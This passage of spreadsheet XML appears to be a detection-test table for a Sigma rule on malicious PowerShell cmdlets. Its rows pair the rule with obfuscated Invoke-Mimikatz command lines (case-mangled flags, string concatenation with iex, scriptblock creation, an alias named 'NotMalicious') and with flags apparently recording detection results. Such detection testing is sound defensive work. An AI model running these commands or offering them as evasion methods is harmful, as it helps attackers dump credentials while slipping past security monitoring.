          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3335" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3335" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3336" ht="15.75" customHeight="1" s="42">
      <c r="A3336" s="43" t="n"/>
      <c r="B3336" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3336" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3336" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3336" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3336" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3336" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3336" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3336" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3337" ht="15.75" customHeight="1" s="42">
      <c r="A3337" s="43" t="n"/>
      <c r="B3337" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3337" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3337" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3337" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3337" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3337" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3337" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3337" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3338" ht="15.75" customHeight="1" s="42">
      <c r="A3338" s="43" t="n"/>
      <c r="B3338" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3338" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3338" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3338" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3338" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3338" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3338" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3339" ht="15.75" customHeight="1" s="42">
      <c r="A3339" s="43" t="n"/>
      <c r="B3339" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3339" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3339" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3339" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3339" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3339" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3339" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3340" ht="15.75" customHeight="1" s="42">
      <c r="A3340" s="43" t="n"/>
      <c r="B3340" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3340" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3340" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3340" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3340" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3340" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3340" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3341" ht="15.75" customHeight="1" s="42">
      <c r="A3341" s="43" t="n"/>
      <c r="B3341" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3341" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3341" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3341" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F3341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3341" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3341" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3341" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3342" ht="15.75" customHeight="1" s="42">
      <c r="A3342" s="43" t="n"/>
      <c r="B3342" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3342" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3342" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3342" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F3342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3342" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3342" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3342" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3342" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3343" ht="15.75" customHeight="1" s="42">
      <c r="A3343" s="43" t="n"/>
      <c r="B3343" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3343" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3343" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3343" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F3343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3343" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3343" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3343" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3343" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3344" ht="15.75" customHeight="1" s="42">
      <c r="A3344" s="43" t="n"/>
      <c r="B3344" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3344" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3344" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3344" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F3344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3344" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3344" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3344" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3345" ht="15.75" customHeight="1" s="42">
      <c r="A3345" s="44" t="n"/>
      <c r="B3345" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3345" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3345" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3345" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F3345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3345" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3345" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3345" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3345" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3345" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3346" ht="15.75" customHeight="1" s="42">
      <c r="A3346" s="44" t="n"/>
      <c r="B3346" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3346" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3346" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3346" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F3346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3346" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3346" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3346" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3346" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3347" ht="15.75" customHeight="1" s="42">
      <c r="A3347" s="44" t="n"/>
      <c r="B3347" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3347" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3347" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3347" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3347" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3347" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3347" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I334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47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3347" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3348" ht="15.75" customHeight="1" s="42">
      <c r="A3348" s="44" t="n"/>
      <c r="B3348" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3348" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3348" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3348" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3348" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3348" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I334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48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3348" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3349" ht="15.75" customHeight="1" s="42">
      <c r="A3349" s="44" t="n"/>
      <c r="B3349" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3349" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3349" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3349" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3349" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3349" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I334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49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3349" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3350" ht="15.75" customHeight="1" s="42">
      <c r="A3350" s="44" t="n"/>
      <c r="B3350" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3350" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3350" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3350" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3350" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3350" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I335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50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3350" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3351" ht="15.75" customHeight="1" s="42">
      <c r="A3351" s="43" t="n"/>
      <c r="B3351" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3351" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3351" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3351" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F3351" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3351" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3351" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3351" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3351" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3352" ht="15.75" customHeight="1" s="42">
      <c r="A3352" s="44" t="n"/>
      <c r="B3352" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3352" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3352" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3352" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F3352" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3352" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3352" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3352" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3352" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3353" ht="15.75" customHeight="1" s="42">
      <c r="A3353" s="43" t="n"/>
      <c r="B3353" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3353" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3353" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3353" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F3353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3353" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3353" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3353" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3354" ht="15.75" customHeight="1" s="42">
      <c r="A3354" s="44" t="n"/>
      <c r="B3354" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3354" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3354" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3354" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F3354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3354" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3354" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3354" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3355" ht="15.75" customHeight="1" s="42">
      <c r="A3355" s="44" t="n"/>
      <c r="B3355" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3355" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3355" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3355" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F3355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3355" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3355" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J3355" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3355" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3356" ht="15.75" customHeight="1" s="42">
      <c r="A3356" s="44" t="n"/>
      <c r="B3356" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3356" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3356" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3356" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I335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56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3356" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3357" ht="15.75" customHeight="1" s="42">
      <c r="A3357" s="44" t="n"/>
      <c r="B3357" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3357" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3357" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3357" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I335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57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3357" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3358" ht="15.75" customHeight="1" s="42">
      <c r="A3358" s="44" t="n"/>
      <c r="B3358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3358" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3358" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3358" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33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58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3358" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3359" ht="15.75" customHeight="1" s="42">
      <c r="A3359" s="44" t="n"/>
      <c r="B3359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3359" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3359" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3359" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I335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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3359" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3360" ht="15.75" customHeight="1" s="42">
      <c r="A3360" s="44" t="n"/>
      <c r="B3360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3360" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3360" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3360" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3360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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3360" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3361" ht="15.75" customHeight="1" s="42">
      <c r="A3361" s="44" t="n"/>
